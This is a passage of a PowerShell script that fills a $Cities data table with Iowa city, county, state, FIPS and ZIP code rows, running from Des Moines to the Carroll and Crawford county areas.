moines","Polk","Iowa","IA","19","50309") + $null = $Cities.Rows.Add("Des moines","Polk","Iowa","IA","19","50310") + $null = $Cities.Rows.Add("Windsor heights","Polk","Iowa","IA","19","50311") + $null = $Cities.Rows.Add("Des moines","Polk","Iowa","IA","19","50312") + $null = $Cities.Rows.Add("Des moines","Polk","Iowa","IA","19","50313") + $null = $Cities.Rows.Add("Des moines","Polk","Iowa","IA","19","50314") + $null = $Cities.Rows.Add("Des moines","Polk","Iowa","IA","19","50315") + $null = $Cities.Rows.Add("Des moines","Polk","Iowa","IA","19","50316") + $null = $Cities.Rows.Add("Pleasant hill","Polk","Iowa","IA","19","50317") + $null = $Cities.Rows.Add("Des moines","Polk","Iowa","IA","19","50320") + $null = $Cities.Rows.Add("Des moines","Polk","Iowa","IA","19","50321") + $null = $Cities.Rows.Add("Urbandale","Polk","Iowa","IA","19","50322") + $null = $Cities.Rows.Add("Zcta 50323","Polk","Iowa","IA","19","50323") + $null = $Cities.Rows.Add("Clive","Polk","Iowa","IA","19","50325") + $null = $Cities.Rows.Add("Zcta 503hh","Polk","Iowa","IA","19","503HH") + $null = $Cities.Rows.Add("Mason city","Cerro Gordo","Iowa","IA","19","50401") + $null = $Cities.Rows.Add("Alexander","Franklin","Iowa","IA","19","50420") + $null = $Cities.Rows.Add("Belmond","Wright","Iowa","IA","19","50421") + $null = $Cities.Rows.Add("Britt","Hancock","Iowa","IA","19","50423") + $null = $Cities.Rows.Add("Buffalo center","Winnebago","Iowa","IA","19","50424") + $null = $Cities.Rows.Add("Carpenter","Mitchell","Iowa","IA","19","50426") + $null = $Cities.Rows.Add("Clear lake","Cerro Gordo","Iowa","IA","19","50428") + $null = $Cities.Rows.Add("Corwith","Hancock","Iowa","IA","19","50430") + $null = $Cities.Rows.Add("Coulter","Franklin","Iowa","IA","19","50431") + $null = $Cities.Rows.Add("Crystal lake","Hancock","Iowa","IA","19","50432") + $null = $Cities.Rows.Add("Dougherty","Cerro Gordo","Iowa","IA","19","50433") + $null = $Cities.Rows.Add("Fertile","Worth","Iowa","IA","19","50434") + $null = $Cities.Rows.Add("Floyd","Floyd","Iowa","IA","19","50435") + $null = $Cities.Rows.Add("Forest city","Winnebago","Iowa","IA","19","50436") + $null = $Cities.Rows.Add("Garner","Hancock","Iowa","IA","19","50438") + $null = $Cities.Rows.Add("Goodell","Hancock","Iowa","IA","19","50439") + $null = $Cities.Rows.Add("Grafton","Worth","Iowa","IA","19","50440") + $null = $Cities.Rows.Add("Hampton","Franklin","Iowa","IA","19","50441") + $null = $Cities.Rows.Add("Hanlontown","Worth","Iowa","IA","19","50444") + $null = $Cities.Rows.Add("Joice","Worth","Iowa","IA","19","50446") + $null = $Cities.Rows.Add("Kanawha","Hancock","Iowa","IA","19","50447") + $null = $Cities.Rows.Add("Kensett","Worth","Iowa","IA","19","50448") + $null = $Cities.Rows.Add("Klemme","Hancock","Iowa","IA","19","50449") + $null = $Cities.Rows.Add("Lake mills","Winnebago","Iowa","IA","19","50450") + $null = $Cities.Rows.Add("Lakota","Kossuth","Iowa","IA","19","50451") + $null = $Cities.Rows.Add("Latimer","Franklin","Iowa","IA","19","50452") + $null = $Cities.Rows.Add("Leland","Winnebago","Iowa","IA","19","50453") + $null = $Cities.Rows.Add("Little cedar","Mitchell","Iowa","IA","19","50454") + $null = $Cities.Rows.Add("Mc intire","Mitchell","Iowa","IA","19","50455") + $null = $Cities.Rows.Add("Manly","Worth","Iowa","IA","19","50456") + $null = $Cities.Rows.Add("Meservey","Cerro Gordo","Iowa","IA","19","50457") + $null = $Cities.Rows.Add("Nora springs","Floyd","Iowa","IA","19","50458") + $null = $Cities.Rows.Add("Northwood","Worth","Iowa","IA","19","50459") + $null = $Cities.Rows.Add("Orchard","Mitchell","Iowa","IA","19","50460") + $null = $Cities.Rows.Add("Osage","Mitchell","Iowa","IA","19","50461") + $null = $Cities.Rows.Add("Plymouth","Cerro Gordo","Iowa","IA","19","50464") + $null = $Cities.Rows.Add("Rake","Winnebago","Iowa","IA","19","50465") + $null = $Cities.Rows.Add("Riceville","Mitchell","Iowa","IA","19","50466") + $null = $Cities.Rows.Add("Rockford","Floyd","Iowa","IA","19","50468") + $null = $Cities.Rows.Add("Rockwell","Cerro Gordo","Iowa","IA","19","50469") + $null = $Cities.Rows.Add("Rowan","Wright","Iowa","IA","19","50470") + $null = $Cities.Rows.Add("Rudd","Floyd","Iowa","IA","19","50471") + $null = $Cities.Rows.Add("Saint ansgar","Mitchell","Iowa","IA","19","50472") + $null = $Cities.Rows.Add("Scarville","Winnebago","Iowa","IA","19","50473") + $null = $Cities.Rows.Add("Sheffield","Franklin","Iowa","IA","19","50475") + $null = $Cities.Rows.Add("Stacyville","Mitchell","Iowa","IA","19","50476") + $null = $Cities.Rows.Add("Swaledale","Cerro Gordo","Iowa","IA","19","50477") + $null = $Cities.Rows.Add("Thompson","Winnebago","Iowa","IA","19","50478") + $null = $Cities.Rows.Add("Thornton","Cerro Gordo","Iowa","IA","19","50479") + $null = $Cities.Rows.Add("Titonka","Kossuth","Iowa","IA","19","50480") + $null = $Cities.Rows.Add("Ventura","Cerro Gordo","Iowa","IA","19","50482") + $null = $Cities.Rows.Add("Wesley","Kossuth","Iowa","IA","19","50483") + $null = $Cities.Rows.Add("Woden","Hancock","Iowa","IA","19","50484") + $null = $Cities.Rows.Add("Zcta 504hh","Cerro Gordo","Iowa","IA","19","504HH") + $null = $Cities.Rows.Add("Fort dodge","Webster","Iowa","IA","19","50501") + $null = $Cities.Rows.Add("Albert city","Buena Vista","Iowa","IA","19","50510") + $null = $Cities.Rows.Add("Algona","Kossuth","Iowa","IA","19","50511") + $null = $Cities.Rows.Add("Armstrong","Emmet","Iowa","IA","19","50514") + $null = $Cities.Rows.Add("Ayrshire","Palo Alto","Iowa","IA","19","50515") + $null = $Cities.Rows.Add("Badger","Webster","Iowa","IA","19","50516") + $null = $Cities.Rows.Add("Bancroft","Kossuth","Iowa","IA","19","50517") + $null = $Cities.Rows.Add("Barnum","Webster","Iowa","IA","19","50518") + $null = $Cities.Rows.Add("Bode","Humboldt","Iowa","IA","19","50519") + $null = $Cities.Rows.Add("Bradgate","Humboldt","Iowa","IA","19","50520") + $null = $Cities.Rows.Add("Burnside","Webster","Iowa","IA","19","50521") + $null = $Cities.Rows.Add("Burt","Kossuth","Iowa","IA","19","50522") + $null = $Cities.Rows.Add("Callender","Webster","Iowa","IA","19","50523") + $null = $Cities.Rows.Add("Clare","Webster","Iowa","IA","19","50524") + $null = $Cities.Rows.Add("Clarion","Wright","Iowa","IA","19","50525") + $null = $Cities.Rows.Add("Curlew","Palo Alto","Iowa","IA","19","50527") + $null = $Cities.Rows.Add("Cylinder","Palo Alto","Iowa","IA","19","50528") + $null = $Cities.Rows.Add("Dakota city","Humboldt","Iowa","IA","19","50529") + $null = $Cities.Rows.Add("Dayton","Webster","Iowa","IA","19","50530") + $null = $Cities.Rows.Add("Dolliver","Emmet","Iowa","IA","19","50531") + $null = $Cities.Rows.Add("Duncombe","Webster","Iowa","IA","19","50532") + $null = $Cities.Rows.Add("Eagle grove","Wright","Iowa","IA","19","50533") + $null = $Cities.Rows.Add("Early","Sac","Iowa","IA","19","50535") + $null = $Cities.Rows.Add("Emmetsburg","Palo Alto","Iowa","IA","19","50536") + $null = $Cities.Rows.Add("Farnhamville","Calhoun","Iowa","IA","19","50538") + $null = $Cities.Rows.Add("Fenton","Kossuth","Iowa","IA","19","50539") + $null = $Cities.Rows.Add("Fonda","Pocahontas","Iowa","IA","19","50540") + $null = $Cities.Rows.Add("Gilmore city","Humboldt","Iowa","IA","19","50541") + $null = $Cities.Rows.Add("Goldfield","Wright","Iowa","IA","19","50542") + $null = $Cities.Rows.Add("Gowrie","Webster","Iowa","IA","19","50543") + $null = $Cities.Rows.Add("Harcourt","Webster","Iowa","IA","19","50544") + $null = $Cities.Rows.Add("Hardy","Humboldt","Iowa","IA","19","50545") + $null = $Cities.Rows.Add("Havelock","Pocahontas","Iowa","IA","19","50546") + $null = $Cities.Rows.Add("Humboldt","Humboldt","Iowa","IA","19","50548") + $null = $Cities.Rows.Add("Jolley","Calhoun","Iowa","IA","19","50551") + $null = $Cities.Rows.Add("Knierim","Calhoun","Iowa","IA","19","50552") + $null = $Cities.Rows.Add("Laurens","Pocahontas","Iowa","IA","19","50554") + $null = $Cities.Rows.Add("Ledyard","Kossuth","Iowa","IA","19","50556") + $null = $Cities.Rows.Add("Lehigh","Webster","Iowa","IA","19","50557") + $null = $Cities.Rows.Add("Livermore","Humboldt","Iowa","IA","19","50558") + $null = $Cities.Rows.Add("Lone rock","Kossuth","Iowa","IA","19","50559") + $null = $Cities.Rows.Add("Lu verne","Kossuth","Iowa","IA","19","50560") + $null = $Cities.Rows.Add("Lytton","Sac","Iowa","IA","19","50561") + $null = $Cities.Rows.Add("Mallard","Palo Alto","Iowa","IA","19","50562") + $null = $Cities.Rows.Add("Manson","Calhoun","Iowa","IA","19","50563") + $null = $Cities.Rows.Add("Marathon","Buena Vista","Iowa","IA","19","50565") + $null = $Cities.Rows.Add("Moorland","Webster","Iowa","IA","19","50566") + $null = $Cities.Rows.Add("Nemaha","Sac","Iowa","IA","19","50567") + $null = $Cities.Rows.Add("Newell","Buena Vista","Iowa","IA","19","50568") + $null = $Cities.Rows.Add("Otho","Webster","Iowa","IA","19","50569") + $null = $Cities.Rows.Add("Ottosen","Humboldt","Iowa","IA","19","50570") + $null = $Cities.Rows.Add("Palmer","Pocahontas","Iowa","IA","19","50571") + $null = $Cities.Rows.Add("Plover","Pocahontas","Iowa","IA","19","50573") + $null = $Cities.Rows.Add("Pocahontas","Pocahontas","Iowa","IA","19","50574") + $null = $Cities.Rows.Add("Pomeroy","Calhoun","Iowa","IA","19","50575") + $null = $Cities.Rows.Add("Rembrandt","Buena Vista","Iowa","IA","19","50576") + $null = $Cities.Rows.Add("Renwick","Humboldt","Iowa","IA","19","50577") + $null = $Cities.Rows.Add("Ringsted","Emmet","Iowa","IA","19","50578") + $null = $Cities.Rows.Add("Rockwell city","Calhoun","Iowa","IA","19","50579") + $null = $Cities.Rows.Add("Rolfe","Pocahontas","Iowa","IA","19","50581") + $null = $Cities.Rows.Add("Rutland","Humboldt","Iowa","IA","19","50582") + $null = $Cities.Rows.Add("Sac city","Sac","Iowa","IA","19","50583") + $null = $Cities.Rows.Add("Sioux rapids","Buena Vista","Iowa","IA","19","50585") + $null = $Cities.Rows.Add("Somers","Calhoun","Iowa","IA","19","50586") + $null = $Cities.Rows.Add("Storm lake","Buena Vista","Iowa","IA","19","50588") + $null = $Cities.Rows.Add("Swea city","Kossuth","Iowa","IA","19","50590") + $null = $Cities.Rows.Add("Thor","Humboldt","Iowa","IA","19","50591") + $null = $Cities.Rows.Add("Truesdale","Buena Vista","Iowa","IA","19","50592") + $null = $Cities.Rows.Add("Varina","Pocahontas","Iowa","IA","19","50593") + $null = $Cities.Rows.Add("Vincent","Webster","Iowa","IA","19","50594") + $null = $Cities.Rows.Add("Webster city","Hamilton","Iowa","IA","19","50595") + $null = $Cities.Rows.Add("West bend","Palo Alto","Iowa","IA","19","50597") + $null = $Cities.Rows.Add("Whittemore","Kossuth","Iowa","IA","19","50598") + $null = $Cities.Rows.Add("Woolstock","Wright","Iowa","IA","19","50599") + $null = $Cities.Rows.Add("Zcta 505hh","Humboldt","Iowa","IA","19","505HH") + $null = $Cities.Rows.Add("Ackley","Hardin","Iowa","IA","19","50601") + $null = $Cities.Rows.Add("Allison","Butler","Iowa","IA","19","50602") + $null = $Cities.Rows.Add("Alta vista","Chickasaw","Iowa","IA","19","50603") + $null = $Cities.Rows.Add("Aplington","Butler","Iowa","IA","19","50604") + $null = $Cities.Rows.Add("Aredale","Butler","Iowa","IA","19","50605") + $null = $Cities.Rows.Add("Arlington","Fayette","Iowa","IA","19","50606") + $null = $Cities.Rows.Add("Aurora","Buchanan","Iowa","IA","19","50607") + $null = $Cities.Rows.Add("Beaman","Grundy","Iowa","IA","19","50609") + $null = $Cities.Rows.Add("Bristow","Butler","Iowa","IA","19","50611") + $null = $Cities.Rows.Add("Buckingham","Tama","Iowa","IA","19","50612") + $null = $Cities.Rows.Add("Cedar falls","Black Hawk","Iowa","IA","19","50613") + $null = $Cities.Rows.Add("Charles city","Floyd","Iowa","IA","19","50616") + $null = $Cities.Rows.Add("Clarksville","Butler","Iowa","IA","19","50619") + $null = $Cities.Rows.Add("Conrad","Grundy","Iowa","IA","19","50621") + $null = $Cities.Rows.Add("Denver","Bremer","Iowa","IA","19","50622") + $null = $Cities.Rows.Add("Dewar","Black Hawk","Iowa","IA","19","50623") + $null = $Cities.Rows.Add("Dike","Grundy","Iowa","IA","19","50624") + $null = $Cities.Rows.Add("Dumont","Butler","Iowa","IA","19","50625") + $null = $Cities.Rows.Add("Dunkerton","Black Hawk","Iowa","IA","19","50626") + $null = $Cities.Rows.Add("Eldora","Hardin","Iowa","IA","19","50627") + $null = $Cities.Rows.Add("Elma","Howard","Iowa","IA","19","50628") + $null = $Cities.Rows.Add("Fairbank","Buchanan","Iowa","IA","19","50629") + $null = $Cities.Rows.Add("Fredericksburg","Chickasaw","Iowa","IA","19","50630") + $null = $Cities.Rows.Add("Frederika","Bremer","Iowa","IA","19","50631") + $null = $Cities.Rows.Add("Garwin","Tama","Iowa","IA","19","50632") + $null = $Cities.Rows.Add("Geneva","Franklin","Iowa","IA","19","50633") + $null = $Cities.Rows.Add("Gilbertville","Black Hawk","Iowa","IA","19","50634") + $null = $Cities.Rows.Add("Gladbrook","Tama","Iowa","IA","19","50635") + $null = $Cities.Rows.Add("Greene","Butler","Iowa","IA","19","50636") + $null = $Cities.Rows.Add("Grundy center","Grundy","Iowa","IA","19","50638") + $null = $Cities.Rows.Add("Hazleton","Buchanan","Iowa","IA","19","50641") + $null = $Cities.Rows.Add("Holland","Grundy","Iowa","IA","19","50642") + $null = $Cities.Rows.Add("Hudson","Black Hawk","Iowa","IA","19","50643") + $null = $Cities.Rows.Add("Independence","Buchanan","Iowa","IA","19","50644") + $null = $Cities.Rows.Add("Ionia","Chickasaw","Iowa","IA","19","50645") + $null = $Cities.Rows.Add("Janesville","Bremer","Iowa","IA","19","50647") + $null = $Cities.Rows.Add("Jesup","Buchanan","Iowa","IA","19","50648") + $null = $Cities.Rows.Add("Kesley","Butler","Iowa","IA","19","50649") + $null = $Cities.Rows.Add("Lamont","Buchanan","Iowa","IA","19","50650") + $null = $Cities.Rows.Add("La porte city","Black Hawk","Iowa","IA","19","50651") + $null = $Cities.Rows.Add("Lincoln","Tama","Iowa","IA","19","50652") + $null = $Cities.Rows.Add("Marble rock","Floyd","Iowa","IA","19","50653") + $null = $Cities.Rows.Add("Masonville","Delaware","Iowa","IA","19","50654") + $null = $Cities.Rows.Add("Maynard","Fayette","Iowa","IA","19","50655") + $null = $Cities.Rows.Add("Nashua","Chickasaw","Iowa","IA","19","50658") + $null = $Cities.Rows.Add("New hampton","Chickasaw","Iowa","IA","19","50659") + $null = $Cities.Rows.Add("New hartford","Butler","Iowa","IA","19","50660") + $null = $Cities.Rows.Add("Oelwein","Fayette","Iowa","IA","19","50662") + $null = $Cities.Rows.Add("Parkersburg","Butler","Iowa","IA","19","50665") + $null = $Cities.Rows.Add("Plainfield","Bremer","Iowa","IA","19","50666") + $null = $Cities.Rows.Add("Raymond","Black Hawk","Iowa","IA","19","50667") + $null = $Cities.Rows.Add("Readlyn","Bremer","Iowa","IA","19","50668") + $null = $Cities.Rows.Add("Reinbeck","Grundy","Iowa","IA","19","50669") + $null = $Cities.Rows.Add("Shell rock","Butler","Iowa","IA","19","50670") + $null = $Cities.Rows.Add("Stanley","Buchanan","Iowa","IA","19","50671") + $null = $Cities.Rows.Add("Steamboat rock","Hardin","Iowa","IA","19","50672") + $null = $Cities.Rows.Add("Stout","Grundy","Iowa","IA","19","50673") + $null = $Cities.Rows.Add("Sumner","Bremer","Iowa","IA","19","50674") + $null = $Cities.Rows.Add("Traer","Tama","Iowa","IA","19","50675") + $null = $Cities.Rows.Add("Tripoli","Bremer","Iowa","IA","19","50676") + $null = $Cities.Rows.Add("Bremer","Bremer","Iowa","IA","19","50677") + $null = $Cities.Rows.Add("Wellsburg","Grundy","Iowa","IA","19","50680") + $null = $Cities.Rows.Add("Westgate","Fayette","Iowa","IA","19","50681") + $null = $Cities.Rows.Add("Winthrop","Buchanan","Iowa","IA","19","50682") + $null = $Cities.Rows.Add("Zcta 506hh","Black Hawk","Iowa","IA","19","506HH") + $null = $Cities.Rows.Add("Waterloo","Black Hawk","Iowa","IA","19","50701") + $null = $Cities.Rows.Add("Waterloo","Black Hawk","Iowa","IA","19","50702") + $null = $Cities.Rows.Add("Waterloo","Black Hawk","Iowa","IA","19","50703") + $null = $Cities.Rows.Add("Washburn","Black Hawk","Iowa","IA","19","50706") + $null = $Cities.Rows.Add("Evansdale","Black Hawk","Iowa","IA","19","50707") + $null = $Cities.Rows.Add("Zcta 507hh","Black Hawk","Iowa","IA","19","507HH") + $null = $Cities.Rows.Add("Nevinville","Union","Iowa","IA","19","50801") + $null = $Cities.Rows.Add("Afton","Union","Iowa","IA","19","50830") + $null = $Cities.Rows.Add("Bedford","Taylor","Iowa","IA","19","50833") + $null = $Cities.Rows.Add("Benton","Ringgold","Iowa","IA","19","50835") + $null = $Cities.Rows.Add("Blockton","Taylor","Iowa","IA","19","50836") + $null = $Cities.Rows.Add("Bridgewater","Adair","Iowa","IA","19","50837") + $null = $Cities.Rows.Add("Clearfield","Taylor","Iowa","IA","19","50840") + $null = $Cities.Rows.Add("Corning","Adams","Iowa","IA","19","50841") + $null = $Cities.Rows.Add("Cumberland","Cass","Iowa","IA","19","50843") + $null = $Cities.Rows.Add("Diagonal","Ringgold","Iowa","IA","19","50845") + $null = $Cities.Rows.Add("Fontanelle","Adair","Iowa","IA","19","50846") + $null = $Cities.Rows.Add("Grant","Montgomery","Iowa","IA","19","50847") + $null = $Cities.Rows.Add("Gravity","Taylor","Iowa","IA","19","50848") + $null = $Cities.Rows.Add("Greenfield","Adair","Iowa","IA","19","50849") + $null = $Cities.Rows.Add("Lenox","Taylor","Iowa","IA","19","50851") + $null = $Cities.Rows.Add("Massena","Cass","Iowa","IA","19","50853") + $null = $Cities.Rows.Add("Mount ayr","Ringgold","Iowa","IA","19","50854") + $null = $Cities.Rows.Add("Nodaway","Adams","Iowa","IA","19","50857") + $null = $Cities.Rows.Add("Orient","Adair","Iowa","IA","19","50858") + $null = $Cities.Rows.Add("Prescott","Adams","Iowa","IA","19","50859") + $null = $Cities.Rows.Add("Redding","Ringgold","Iowa","IA","19","50860") + $null = $Cities.Rows.Add("Shannon city","Union","Iowa","IA","19","50861") + $null = $Cities.Rows.Add("Sharpsburg","Taylor","Iowa","IA","19","50862") + $null = $Cities.Rows.Add("Tingley","Ringgold","Iowa","IA","19","50863") + $null = $Cities.Rows.Add("Villisca","Montgomery","Iowa","IA","19","50864") + $null = $Cities.Rows.Add("Akron","Plymouth","Iowa","IA","19","51001") + $null = $Cities.Rows.Add("Alta","Buena Vista","Iowa","IA","19","51002") + $null = $Cities.Rows.Add("Alton","Sioux","Iowa","IA","19","51003") + $null = $Cities.Rows.Add("Anthon","Woodbury","Iowa","IA","19","51004") + $null = $Cities.Rows.Add("Aurelia","Cherokee","Iowa","IA","19","51005") + $null = $Cities.Rows.Add("Battle creek","Ida","Iowa","IA","19","51006") + $null = $Cities.Rows.Add("Bronson","Woodbury","Iowa","IA","19","51007") + $null = $Cities.Rows.Add("Brunsville","Plymouth","Iowa","IA","19","51008") + $null = $Cities.Rows.Add("Castana","Monona","Iowa","IA","19","51010") + $null = $Cities.Rows.Add("Chatsworth","Sioux","Iowa","IA","19","51011") + $null = $Cities.Rows.Add("Cherokee","Cherokee","Iowa","IA","19","51012") + $null = $Cities.Rows.Add("Cleghorn","Cherokee","Iowa","IA","19","51014") + $null = $Cities.Rows.Add("Correctionville","Woodbury","Iowa","IA","19","51016") + $null = $Cities.Rows.Add("Cushing","Woodbury","Iowa","IA","19","51018") + $null = $Cities.Rows.Add("Danbury","Woodbury","Iowa","IA","19","51019") + $null = $Cities.Rows.Add("Galva","Ida","Iowa","IA","19","51020") + $null = $Cities.Rows.Add("Granville","Sioux","Iowa","IA","19","51022") + $null = $Cities.Rows.Add("Hawarden","Sioux","Iowa","IA","19","51023") + $null = $Cities.Rows.Add("Hinton","Plymouth","Iowa","IA","19","51024") + $null = $Cities.Rows.Add("Holstein","Ida","Iowa","IA","19","51025") + $null = $Cities.Rows.Add("Hornick","Woodbury","Iowa","IA","19","51026") + $null = $Cities.Rows.Add("Ireton","Sioux","Iowa","IA","19","51027") + $null = $Cities.Rows.Add("Kingsley","Plymouth","Iowa","IA","19","51028") + $null = $Cities.Rows.Add("Larrabee","Cherokee","Iowa","IA","19","51029") + $null = $Cities.Rows.Add("Lawton","Woodbury","Iowa","IA","19","51030") + $null = $Cities.Rows.Add("Le mars","Plymouth","Iowa","IA","19","51031") + $null = $Cities.Rows.Add("Linn grove","Buena Vista","Iowa","IA","19","51033") + $null = $Cities.Rows.Add("Mapleton","Monona","Iowa","IA","19","51034") + $null = $Cities.Rows.Add("Marcus","Cherokee","Iowa","IA","19","51035") + $null = $Cities.Rows.Add("Maurice","Sioux","Iowa","IA","19","51036") + $null = $Cities.Rows.Add("Meriden","Cherokee","Iowa","IA","19","51037") + $null = $Cities.Rows.Add("Merrill","Plymouth","Iowa","IA","19","51038") + $null = $Cities.Rows.Add("Moville","Woodbury","Iowa","IA","19","51039") + $null = $Cities.Rows.Add("Onawa","Monona","Iowa","IA","19","51040") + $null = $Cities.Rows.Add("Orange city","Sioux","Iowa","IA","19","51041") + $null = $Cities.Rows.Add("Oto","Woodbury","Iowa","IA","19","51044") + $null = $Cities.Rows.Add("Oyens","Plymouth","Iowa","IA","19","51045") + $null = $Cities.Rows.Add("Paullina","OBrien","Iowa","IA","19","51046") + $null = $Cities.Rows.Add("Peterson","Clay","Iowa","IA","19","51047") + $null = $Cities.Rows.Add("Pierson","Woodbury","Iowa","IA","19","51048") + $null = $Cities.Rows.Add("Quimby","Cherokee","Iowa","IA","19","51049") + $null = $Cities.Rows.Add("Remsen","Plymouth","Iowa","IA","19","51050") + $null = $Cities.Rows.Add("Rodney","Monona","Iowa","IA","19","51051") + $null = $Cities.Rows.Add("Salix","Woodbury","Iowa","IA","19","51052") + $null = $Cities.Rows.Add("Schaller","Sac","Iowa","IA","19","51053") + $null = $Cities.Rows.Add("Sergeant bluff","Woodbury","Iowa","IA","19","51054") + $null = $Cities.Rows.Add("Sloan","Woodbury","Iowa","IA","19","51055") + $null = $Cities.Rows.Add("Smithland","Woodbury","Iowa","IA","19","51056") + $null = $Cities.Rows.Add("Sutherland","OBrien","Iowa","IA","19","51058") + $null = $Cities.Rows.Add("Turin","Monona","Iowa","IA","19","51059") + $null = $Cities.Rows.Add("Ute","Monona","Iowa","IA","19","51060") + $null = $Cities.Rows.Add("Washta","Cherokee","Iowa","IA","19","51061") + $null = $Cities.Rows.Add("Westfield","Plymouth","Iowa","IA","19","51062") + $null = $Cities.Rows.Add("Whiting","Monona","Iowa","IA","19","51063") + $null = $Cities.Rows.Add("Zcta 510hh","Monona","Iowa","IA","19","510HH") + $null = $Cities.Rows.Add("Sioux city","Woodbury","Iowa","IA","19","51101") + $null = $Cities.Rows.Add("Sioux city","Woodbury","Iowa","IA","19","51103") + $null = $Cities.Rows.Add("Sioux city","Woodbury","Iowa","IA","19","51104") + $null = $Cities.Rows.Add("Sioux city","Woodbury","Iowa","IA","19","51105") + $null = $Cities.Rows.Add("Sioux city","Woodbury","Iowa","IA","19","51106") + $null = $Cities.Rows.Add("Sioux city","Woodbury","Iowa","IA","19","51108") + $null = $Cities.Rows.Add("Sioux city","Woodbury","Iowa","IA","19","51109") + $null = $Cities.Rows.Add("Sioux city","Woodbury","Iowa","IA","19","51111") + $null = $Cities.Rows.Add("Zcta 511hh","Woodbury","Iowa","IA","19","511HH") + $null = $Cities.Rows.Add("Sheldon","OBrien","Iowa","IA","19","51201") + $null = $Cities.Rows.Add("Alvord","Lyon","Iowa","IA","19","51230") + $null = $Cities.Rows.Add("Archer","OBrien","Iowa","IA","19","51231") + $null = $Cities.Rows.Add("Ashton","Osceola","Iowa","IA","19","51232") + $null = $Cities.Rows.Add("Boyden","Sioux","Iowa","IA","19","51234") + $null = $Cities.Rows.Add("Doon","Lyon","Iowa","IA","19","51235") + $null = $Cities.Rows.Add("George","Lyon","Iowa","IA","19","51237") + $null = $Cities.Rows.Add("Hospers","Sioux","Iowa","IA","19","51238") + $null = $Cities.Rows.Add("Hull","Sioux","Iowa","IA","19","51239") + $null = $Cities.Rows.Add("Inwood","Lyon","Iowa","IA","19","51240") + $null = $Cities.Rows.Add("Larchwood","Lyon","Iowa","IA","19","51241") + $null = $Cities.Rows.Add("Lester","Lyon","Iowa","IA","19","51242") + $null = $Cities.Rows.Add("Little rock","Lyon","Iowa","IA","19","51243") + $null = $Cities.Rows.Add("Matlock","Sioux","Iowa","IA","19","51244") + $null = $Cities.Rows.Add("Primghar","OBrien","Iowa","IA","19","51245") + $null = $Cities.Rows.Add("Rock rapids","Lyon","Iowa","IA","19","51246") + $null = $Cities.Rows.Add("Rock valley","Sioux","Iowa","IA","19","51247") + $null = $Cities.Rows.Add("Sanborn","OBrien","Iowa","IA","19","51248") + $null = $Cities.Rows.Add("Sibley","Osceola","Iowa","IA","19","51249") + $null = $Cities.Rows.Add("Sioux center","Sioux","Iowa","IA","19","51250") + $null = $Cities.Rows.Add("Spencer","Clay","Iowa","IA","19","51301") + $null = $Cities.Rows.Add("Arnolds park","Dickinson","Iowa","IA","19","51331") + $null = $Cities.Rows.Add("Dickens","Clay","Iowa","IA","19","51333") + $null = $Cities.Rows.Add("Estherville","Emmet","Iowa","IA","19","51334") + $null = $Cities.Rows.Add("Everly","Clay","Iowa","IA","19","51338") + $null = $Cities.Rows.Add("Gillett grove","Clay","Iowa","IA","19","51341") + $null = $Cities.Rows.Add("Graettinger","Palo Alto","Iowa","IA","19","51342") + $null = $Cities.Rows.Add("Greenville","Clay","Iowa","IA","19","51343") + $null = $Cities.Rows.Add("Gruver","Emmet","Iowa","IA","19","51344") + $null = $Cities.Rows.Add("Harris","Osceola","Iowa","IA","19","51345") + $null = $Cities.Rows.Add("Hartley","OBrien","Iowa","IA","19","51346") + $null = $Cities.Rows.Add("Lake park","Dickinson","Iowa","IA","19","51347") + $null = $Cities.Rows.Add("May city","Osceola","Iowa","IA","19","51349") + $null = $Cities.Rows.Add("Melvin","Osceola","Iowa","IA","19","51350") + $null = $Cities.Rows.Add("Milford","Dickinson","Iowa","IA","19","51351") + $null = $Cities.Rows.Add("Ocheyedan","Osceola","Iowa","IA","19","51354") + $null = $Cities.Rows.Add("Okoboji","Dickinson","Iowa","IA","19","51355") + $null = $Cities.Rows.Add("Royal","Clay","Iowa","IA","19","51357") + $null = $Cities.Rows.Add("Ruthven","Palo Alto","Iowa","IA","19","51358") + $null = $Cities.Rows.Add("Spirit lake","Dickinson","Iowa","IA","19","51360") + $null = $Cities.Rows.Add("Superior","Dickinson","Iowa","IA","19","51363") + $null = $Cities.Rows.Add("Terril","Dickinson","Iowa","IA","19","51364") + $null = $Cities.Rows.Add("Wallingford","Emmet","Iowa","IA","19","51365") + $null = $Cities.Rows.Add("Webb","Clay","Iowa","IA","19","51366") + $null = $Cities.Rows.Add("Zcta 513hh","Dickinson","Iowa","IA","19","513HH") + $null = $Cities.Rows.Add("Carroll","Carroll","Iowa","IA","19","51401") + $null = $Cities.Rows.Add("Arcadia","Carroll","Iowa","IA","19","51430") + $null = $Cities.Rows.Add("Arthur","Ida","Iowa","IA","19","51431") + $null = $Cities.Rows.Add("Yetter","Sac","Iowa","IA","19","51433") + $null = $Cities.Rows.Add("Breda","Carroll","Iowa","IA","19","51436") + $null = $Cities.Rows.Add("Charter oak","Crawford","Iowa","IA","19","51439") + $null = $Cities.Rows.Add("Dedham","Carroll","Iowa","IA","19","51440") + $null = $Cities.Rows.Add("Deloit","Crawford","Iowa","IA","19","51441") + $null = $Cities.Rows.Add("Denison","Crawford","Iowa","IA","19","51442") + $null = $Cities.Rows.Add("Glidden","Carroll","Iowa","IA","19","51443") + $null = $Cities.Rows.Add("Halbur","Carroll","Iowa","IA","19","51444") + $null = $Cities.Rows.Add("Ida grove","Ida","Iowa","IA","19","51445") + $null = $Cities.Rows.Add("Irwin","Shelby","Iowa","IA","19","51446") + $null = $Cities.Rows.Add("Kirkman","Shelby","Iowa","IA","19","51447") + $null = $Cities.Rows.Add("Kiron","Crawford","Iowa","IA","19","51448") + $null = $Cities.Rows.Add("Lake city","Calhoun","Iowa","IA","19","51449") + $null = $Cities.Rows.Add("Lake view","Sac","Iowa","IA","19","51450") + $null = $Cities.Rows.Add("Lanesboro","Carroll","Iowa","IA","19","51451") + $null = $Cities.Rows.Add("Lidderdale","Carroll","Iowa","IA","19","51452") + $null = $Cities.Rows.Add("Lohrville","Calhoun","Iowa","IA","19","51453") + $null = $Cities.Rows.Add("Manilla","Crawford","Iowa","IA","19","51454") + $null = $Cities.Rows.Add("Manning","Carroll","Iowa","IA","19","51455") + $null = $Cities.Rows.Add("Odebolt","Sac","Iowa","IA","19","51458") + $null = $Cities.Rows.Add("Ralston","Carroll","Iowa","IA","19","51459") + $null = $Cities.Rows.Add("Schleswig","Crawford","Iowa","IA","19","51461") + $null = $Cities.Rows.Add("Scranton","Greene","Iowa","IA","19","51462") + $null = $Cities.Rows.Add("Templeton","Carroll","Iowa","IA","19","51463") + $null = $Cities.Rows.Add("Vail","Crawford","Iowa","IA","19","51465") + $null = $Cities.Rows.Add("Wall 